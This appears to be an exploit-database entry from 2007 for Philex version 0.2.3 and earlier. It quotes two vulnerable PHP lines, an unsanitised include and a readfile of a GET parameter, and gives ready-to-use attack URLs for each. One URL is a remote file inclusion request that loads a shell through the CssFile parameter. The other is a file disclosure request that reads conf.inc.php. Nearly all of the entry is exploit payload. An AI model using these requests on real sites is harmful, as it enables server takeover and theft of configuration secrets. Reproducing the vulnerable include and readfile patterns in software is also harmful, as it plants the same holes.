id: 1640
date: 03/23/2007
title: Philex <= 0.2.3 RFI / File Disclosure Remote Vulnerabilities
author: GoLd_M
cves: 

============================================================
Philex <= 0.2.3 RFI / File Disclosure Remote Vulnerabilities
============================================================



######################################################
# Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities
# Discovered by: GloD_M = [Mahmood_ali]
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
######################################################
# V.Code Include:                                    #
# <?include $CssFile;?>                              #
# Exploit Remote File Include:                       #
# [Path_Philex]/header.inc.php?CssFile=Shell         #
######################################################
# V.Code Disclosure:                                 #
# readfile($HTTP_GET_VARS["file"]);                  #
# Exploit Remote File Disclosure:                    #
# [Path_Philex]/download.php?file=conf.inc.php       #
######################################################



#  0day.today [2023-03-22]  #